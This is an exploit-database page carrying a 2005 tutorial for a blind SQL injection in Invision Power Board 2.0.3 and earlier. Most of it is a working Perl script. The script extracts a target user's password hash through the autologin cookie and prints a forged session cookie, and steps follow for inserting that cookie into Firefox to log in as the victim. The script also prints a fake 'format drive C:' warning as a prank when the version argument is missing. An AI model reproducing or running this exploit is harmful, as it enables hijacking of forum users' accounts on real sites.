Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtDanica Jones1337DAY-ID-110
HistoryMay 27, 2005 - 12:00 a.m.

Invision Power Board <= 2.0.3 Login.PHP SQL Injection (tutorial)

2005-05-2700:00:00
Danica Jones
0day.today
41
JSON

Exploit for unknown platform in category web applications

================================================================
Invision Power Board <= 2.0.3 Login.PHP SQL Injection (tutorial)
================================================================




# danica jones <[email protected]>

Tutorial for the recent exploit released by Petey Beege.

1. Get the exploit :



#!/usr/bin/perl -w
##################################################################
# This one actually works :) Just paste the outputted cookie into
# your request header using livehttpheaders or something and you
# will probably be logged in as that user. No need to decrypt it!
# Exploit coded by "Tony Little Lately" and "Petey Beege"
##################################################################

use LWP::UserAgent;

   $ua = new LWP::UserAgent;
   $ua->agent("Mosiac 1.0" . $ua->agent);

if (!$ARGV[0]) {$ARGV[0] = '';}
if (!$ARGV[3]) {$ARGV[3] = '';}

my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
my $user = $ARGV[1];   # userid to jack
my $iver = $ARGV[2];   # version 1 or 2
my $cpre = $ARGV[3];   # cookie prefix
my $dbug = $ARGV[4];   # debug?

if (!$ARGV[2])
{
        print "The type of the file system is NTFS.\n\n";
        print "WARNING, ALL DATA ON NON-REMOVABLE DISK\n";
        print "DRIVE C: WILL BE LOST!\n";
        print "Proceed with Format (Y/N)?\n";
        exit;
}

my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");

my $outputs = '';

for( $i=1; $i < 33; $i++ )
{
        for( $j=0; $j < 16; $j++ )
        {
                my $current = $charset[$j];
            my $sql = ( $iver < 2 ) ?  "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
"99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
                my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql);
                my $res = $ua->get($path, @cookie);

                # If we get a valid sql request then this
                # does not appear anywhere in the sources
                $pattern = '<title>(.*)Log In(.*)</title>';

                $_ = $res->content;

                if ($dbug) { print };

                if ( !(/$pattern/) )
                {
                        $outputs .= $current;
                        print "$current\n";
                    last;
                }

        }
  if ( length($outputs) < 1 )   { print "Not Exploitable!\n"; exit;     }
}
print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
exit;





2. Make sure you have LWP::UserAgent perl module if not do this:
     a. perl -MCPAN -e 'shell'
     b. inside the perl shell, do this 'install LWP::UserAgent'
3. Run the exploit. Get the password hash for the desired login id

ex. inv.pl http://forums.elitesite.com 2 2

Where 2 is the login id and 2 for version 2 of IPB.

4. Open wordpad. Edit Mozilla Firefox's cookie file. Mine is located at

C:\Documents and Settings\the1\Application Data\Mozilla\Firefox\Profiles\vspyhjb9.default\cookies.txt"

Add the following entries:

forums.elitesite.com        FALSE        /        FALSE		1148708747	  member_id        1
forums.elitesite.com        FALSE        /        FALSE		1148708747        pass_hash        ecb735f70028a9cdb819828f4aced78c

Notice the value of member_id and pass_hash taken from the values
generated by the exploit.

5. Fire up Mozilla Firefox and login to http://forums.elitesite.com

Enjoy!




#  0day.today [2018-02-19]  #
JSON